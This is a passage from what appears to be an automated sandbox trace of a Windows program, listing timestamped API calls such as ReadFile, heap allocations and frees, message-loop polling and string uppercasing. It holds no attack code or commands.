lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xc90, lpOverlapped=0x0) returned 1 [0161.336] ReadFile (in: hFile=0x1e8, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0161.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0161.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10c90) returned 0x24d7a58 [0161.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36a0020 | out: hHeap=0x25c0000) returned 1 [0161.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0161.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0161.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10c90) returned 0x34b2250 [0161.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0161.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.340] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0161.340] TranslateMessage (lpMsg=0x8bf710) returned 0 [0161.340] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0161.340] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0161.340] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0161.340] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10c90) returned 0x24d7a58 [0161.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0161.341] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0161.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0161.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0161.341] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0161.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10c90) returned 0x24d7a58 [0161.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0161.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0161.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0161.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0161.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10c90) returned 0x34c2ee8 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0161.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0161.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0161.344] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0161.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0161.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.345] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0161.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0161.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0161.345] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.345] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0161.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0161.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0161.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.347] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0161.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0161.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.348] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0161.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0161.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0161.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.349] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0161.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0161.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0161.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.350] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0161.350] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0161.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.350] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0161.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0161.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0161.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.351] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0161.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0161.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0161.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0161.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.352] HeapFree 